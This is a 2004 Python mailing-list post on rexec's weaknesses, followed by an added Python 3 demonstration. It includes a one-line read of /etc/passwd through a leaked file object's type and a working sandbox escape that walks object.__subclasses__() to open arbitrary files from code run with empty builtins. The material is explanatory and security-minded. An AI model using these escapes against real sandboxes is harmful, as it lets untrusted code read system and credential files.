Creating a capabilities-based restricted execution system

Martin v. Loewis martin at v.loewis.de
Sat Jan 3 07:09:48 EST 2004


Sean R. Lynch wrote:
> If you know of a location where the known shortcomings of rexec are 
> documented, please let me know. So far I've only seen a couple examples 
> and a lot of people saying "it's not secure so let's disable it."

The biggest problem is that new-style classes are both available through
the type() builtin, and callable to create new instances.

For example, if you have managed to open a file object f, then

type(f)("/etc/passwd").read()

lets you access a different file, bypassing all machinery that may
have been designed to prevent that from happening.

Of course, for the specific case of file objects, there is additional
machinery preventing that from happening, but in the general case,
there might be more problems in that area. For example, 
object.__subclasses__() gives you access to quite a lot of stuff.

Regards,
Martin
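The two escape routes Martin describes, carried into Python 3 as an added example (this is not code from the original post, and rexec itself no longer exists). The sandbox is assumed to be a bare exec() with __builtins__ emptied, the way a naive rexec-style system would try it; the unbuffered file object standing in for "a file object f" is an _io.FileIO, and the secret file content is constructed here for the demonstration.

```python
import os
import tempfile

# Constructed sample content standing in for a file the sandbox was not
# supposed to reach (the /etc/passwd of Martin's example).
SECRET = b"root:x:0:0:root:/root:/bin/sh\n"


def read_via_leaked_file(leaked, target):
    """Martin's type(f) trick, Python 3 flavour.

    open(..., 'rb', buffering=0) returns an _io.FileIO, and FileIO is
    callable with a path, so one leaked handle is enough to open an
    unrelated file.  The sandbox never handed us `open` or `target`'s
    contents; the constructor was reachable from the object itself.
    """
    with type(leaked)(target, "r") as g:
        return g.read()


# The general version: what an attacker types into a namespace that strips
# every builtin.  Only literals and attribute access are needed:
#   ().__class__.__base__   is `object`
#   ().__class__.__class__  is `type`
# and every class the interpreter has loaded is reachable from `object`
# through __subclasses__().  type.__subclasses__(cls) is used instead of
# cls.__subclasses__() because the latter raises TypeError once the walk
# reaches `type` itself.  `target` is the one name the host exposes.
SANDBOX_SOURCE = """
type_cls = ().__class__.__class__
queue = [().__class__.__base__]
result = None
while queue and result is None:
    cls = queue.pop(0)
    if cls.__name__ == 'FileIO' and cls.__module__ == '_io':
        with cls(target, 'r') as fh:
            result = fh.read()
    else:
        queue.extend(type_cls.__subclasses__(cls))
"""


def escape_from_empty_builtins(target):
    """Run SANDBOX_SOURCE under exec() with __builtins__ emptied out (the
    assumed stand-in for a restricted environment) and return what the
    untrusted code managed to read."""
    env = {"__builtins__": {}, "target": target}
    exec(SANDBOX_SOURCE, env)
    return env["result"]


def demo():
    """Write the constructed secret to a temporary file, run both escape
    routes against it, and return what each one read.  Cleans up after
    itself so it is safe to run repeatedly."""
    fd, target = tempfile.mkstemp()
    with os.fdopen(fd, "wb") as fh:
        fh.write(SECRET)
    try:
        # The "leaked" object is a harmless handle on /dev/null; the point
        # is that its type, not its contents, is what the attacker uses.
        with open(os.devnull, "rb", buffering=0) as leaked:
            via_type = read_via_leaked_file(leaked, target)
        via_subclasses = escape_from_empty_builtins(target)
        return via_type, via_subclasses
    finally:
        os.unlink(target)


if __name__ == "__main__":
    via_type, via_subclasses = demo()
    print("type(f) route read:       ", via_type)
    print("__subclasses__ route read:", via_subclasses)
```

The second route is the one that makes namespace stripping hopeless: it needs no leaked object at all, only a tuple literal, which is why later sandboxing efforts moved to restricting the object graph (or the interpreter) rather than the names visible to the code.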
